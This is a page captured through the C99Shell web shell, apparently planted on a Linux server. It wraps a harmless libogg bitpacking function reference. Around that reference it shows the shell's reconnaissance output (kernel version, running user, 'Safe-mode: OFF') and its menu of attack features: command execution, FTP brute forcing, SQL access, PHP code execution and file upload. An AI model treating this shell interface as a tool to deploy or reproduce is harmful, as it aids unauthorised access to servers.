!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/usr/doc/libogg-1.0/ogg/   drwxr-xr-x
Free 318.3 GB of 458.09 GB (69.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     bitpacking.html (3.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
libogg - Bitpacking Functions

libogg documentation

libogg release 1.0 - 20000615

Bitpacking Functions

Libogg contains a basic bitpacking library that is useful for manipulating data within a buffer.

All the libogg specific functions are declared in "ogg/ogg.h".

function purpose
oggpack_writeinit Initializes a buffer for writing using this bitpacking library.
oggpack_reset Clears and resets the buffer to the initial position.
oggpack_writeclear Frees the memory used by the buffer.
oggpack_readinit Initializes a buffer for reading using this bitpacking library.
oggpack_write Writes bytes to the specified location within the buffer.
oggpack_look Look at a specified number of bits, <=32, without advancing the location pointer.
oggpack_look1 Looks at one bit without advancing the location pointer.
oggpack_adv Advances the location pointer by a specified number of bits.
oggpack_adv1 Advances the location pointer by one bit.
oggpack_read Reads a specified number of bits from the buffer.
oggpack_read1 Reads one bit from the buffer.
oggpack_bytes Returns the total number of bytes contained within the buffer.
oggpack_bits Returns the total number of bits contained within the buffer.
oggpack_get_buffer Returns a pointer to the buffer encapsulated within the oggpack_buffer struct.



copyright © 2000 xiph.org

Ogg Vorbis
team@xiph.org

libogg documentation

libogg release 1.0 - 20000615


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.027 ]--